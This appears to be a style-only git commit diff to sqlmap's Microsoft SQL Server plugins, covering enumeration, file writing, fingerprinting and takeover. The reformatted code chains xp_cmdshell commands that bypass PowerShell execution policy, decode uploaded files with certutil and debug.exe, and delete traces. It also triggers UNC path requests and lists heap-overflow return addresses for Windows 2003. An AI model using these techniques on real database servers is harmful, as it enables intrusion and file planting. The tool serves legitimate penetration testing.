Some more PEPing (I hope that I haven't broke anything)

2025-12-07 05:01:30 +00:00 · 2018-03-13 13:45:42 +01:00
parent 8166a4eeb8
commit fa4c1c5251
66 changed files with 1157 additions and 1288 deletions
--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -368,16 +368,16 @@ class Enumeration(GenericEnumeration):
                            if foundTbl not in dbs[db]:
                                dbs[db][foundTbl] = {}

-                            if colConsider == "1":
+                            if colConsider == '1':
                                conf.db = db
                                conf.tbl = foundTbl
                                conf.col = column

                                self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)

-                                if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db]\
-                                  and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
+                                if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
                                    dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl])
+
                                kb.data.cachedColumns = {}
                            else:
                                dbs[db][foundTbl][column] = None
--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
@@ -73,10 +73,13 @@ class Filesystem(GenericFilesystem):

        logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))

-        commands = ("cd \"%s\"" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr)
-        complComm = " & ".join(command for command in commands)
+        commands = (
+            "cd \"%s\"" % tmpPath,
+            "debug < %s" % randScr,
+            "del /F /Q %s" % randScr
+        )

-        self.execCmd(complComm)
+        self.execCmd(" & ".join(command for command in commands))

        return chunkName

@@ -195,12 +198,13 @@ class Filesystem(GenericFilesystem):

        logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)

-        commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
-                    "del /F /Q \"%s\"" % encodedBase64FilePath,
-                    "del /F /Q \"%s\"" % randPSScriptPath)
-        complComm = " & ".join(command for command in commands)
+        commands = (
+            "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
+            "del /F /Q \"%s\"" % encodedBase64FilePath,
+            "del /F /Q \"%s\"" % randPSScriptPath
+        )

-        self.execCmd(complComm)
+        self.execCmd(" & ".join(command for command in commands))

    def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
        infoMsg = "using debug.exe to write the %s " % fileType
@@ -219,10 +223,13 @@ class Filesystem(GenericFilesystem):
            debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
            logger.debug(debugMsg)

-            commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
-            complComm = " & ".join(command for command in commands)
+            commands = (
+                "cd \"%s\"" % tmpPath,
+                "ren %s %s" % (chunkName, dFileName),
+                "move /Y %s %s" % (dFileName, dFile)
+            )

-            self.execCmd(complComm)
+            self.execCmd(" & ".join(command for command in commands))
        else:
            debugMsg = "the file is larger than %d bytes. " % debugSize
            debugMsg += "sqlmap will split it into chunks locally, upload "
@@ -244,17 +251,22 @@ class Filesystem(GenericFilesystem):
                debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
                logger.debug(debugMsg)

-                commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F /Q %s" % chunkName)
-                complComm = " & ".join(command for command in commands)
+                commands = (
+                    "cd \"%s\"" % tmpPath,
+                    copyCmd,
+                    "del /F /Q %s" % chunkName
+                )

-                self.execCmd(complComm)
+                self.execCmd(" & ".join(command for command in commands))

            logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))

-            commands = ("cd \"%s\"" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
-            complComm = " & ".join(command for command in commands)
+            commands = (
+                "cd \"%s\"" % tmpPath,
+                "move /Y %s %s" % (dFileName, dFile)
+            )

-            self.execCmd(complComm)
+            self.execCmd(" & ".join(command for command in commands))

    def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
        infoMsg = "using a custom visual basic script to write the "
@@ -330,12 +342,14 @@ class Filesystem(GenericFilesystem):

        self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)

-        commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs,
-                     "del /F /Q %s" % randVbs,
-                     "del /F /Q %s" % randFile)
-        complComm = " & ".join(command for command in commands)
+        commands = (
+            "cd \"%s\"" % tmpPath,
+            "cscript //nologo %s" % randVbs,
+            "del /F /Q %s" % randVbs,
+            "del /F /Q %s" % randFile
+        )

-        self.execCmd(complComm)
+        self.execCmd(" & ".join(command for command in commands))

    def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
        infoMsg = "using certutil.exe to write the %s " % fileType
@@ -349,7 +363,7 @@ class Filesystem(GenericFilesystem):

        encodedFileContent = base64encode(wFileContent)

-        splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
+        splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])

        logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)

@@ -357,11 +371,13 @@ class Filesystem(GenericFilesystem):

        logger.debug("decoding the file to %s.." % dFile)

-        commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile),
-                     "del /F /Q %s" % randFile)
-        complComm = " & ".join(command for command in commands)
+        commands = (
+            "cd \"%s\"" % tmpPath,
+            "certutil -f -decode %s %s" % (randFile, dFile),
+            "del /F /Q %s" % randFile
+        )

-        self.execCmd(complComm)
+        self.execCmd(" & ".join(command for command in commands))

    def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
        # NOTE: this is needed here because we use xp_cmdshell extended
--- a/plugins/dbms/mssqlserver/fingerprint.py
+++ b/plugins/dbms/mssqlserver/fingerprint.py
@@ -88,12 +88,14 @@ class Fingerprint(GenericFingerprint):
            infoMsg = "confirming %s" % DBMS.MSSQL
            logger.info(infoMsg)

-            for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \
-                                    ("2005", "XACT_STATE()=XACT_STATE()"), \
-                                    ("2008", "SYSDATETIME()=SYSDATETIME()"), \
-                                    ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), \
-                                    ("2014", "CHARINDEX('12.0.2000',@@version)>0"), \
-                                    ("2016", "ISJSON(NULL) IS NULL")):
+            for version, check in (
+                ("2000", "HOST_NAME()=HOST_NAME()"),
+                ("2005", "XACT_STATE()=XACT_STATE()"),
+                ("2008", "SYSDATETIME()=SYSDATETIME()"),
+                ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"),
+                ("2014", "CHARINDEX('12.0.2000',@@version)>0"),
+                ("2016", "ISJSON(NULL) IS NULL")
+            ):
                result = inject.checkBooleanExpression(check)

                if result:
@@ -136,14 +138,16 @@ class Fingerprint(GenericFingerprint):

        # Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions
        # http://en.wikipedia.org/wiki/Windows_NT#Releases
-        versions = { "NT": ("4.0", (6, 5, 4, 3, 2, 1)),
-                     "2000": ("5.0", (4, 3, 2, 1)),
-                     "XP": ("5.1", (3, 2, 1)),
-                     "2003": ("5.2", (2, 1)),
-                     "Vista or 2008": ("6.0", (2, 1)),
-                     "7 or 2008 R2": ("6.1", (1, 0)),
-                     "8 or 2012": ("6.2", (0,)),
-                     "8.1 or 2012 R2": ("6.3", (0,)) }
+        versions = {
+            "NT": ("4.0", (6, 5, 4, 3, 2, 1)),
+            "2000": ("5.0", (4, 3, 2, 1)),
+            "XP": ("5.1", (3, 2, 1)),
+            "2003": ("5.2", (2, 1)),
+            "Vista or 2008": ("6.0", (2, 1)),
+            "7 or 2008 R2": ("6.1", (1, 0)),
+            "8 or 2012": ("6.2", (0,)),
+            "8.1 or 2012 R2": ("6.3", (0,))
+        }

        # Get back-end DBMS underlying operating system version
        for version, data in versions.items():
--- a/plugins/dbms/mssqlserver/takeover.py
+++ b/plugins/dbms/mssqlserver/takeover.py
@@ -20,7 +20,7 @@ class Takeover(GenericTakeover):
        GenericTakeover.__init__(self)

    def uncPathRequest(self):
-        #inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True)
+        # inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True)
        inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath)

    def spHeapOverflow(self):
@@ -31,21 +31,22 @@ class Takeover(GenericTakeover):
        """

        returns = {
-                    # 2003 Service Pack 0
-                    "2003-0": (""),
+            # 2003 Service Pack 0
+            "2003-0": (""),

-                    # 2003 Service Pack 1
-                    "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)" ),
+            # 2003 Service Pack 1
+            "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"),

-                    # 2003 Service Pack 2 updated at 12/2008
-                    #"2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)" ),
+            # 2003 Service Pack 2 updated at 12/2008
+            # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"),

-                    # 2003 Service Pack 2 updated at 05/2009
-                    "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"),
+            # 2003 Service Pack 2 updated at 05/2009
+            "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"),
+
+            # 2003 Service Pack 2 updated at 09/2009
+            # "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),
+        }

-                    # 2003 Service Pack 2 updated at 09/2009
-                    #"2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),
-                  }
        addrs = None

        for versionSp, data in returns.items():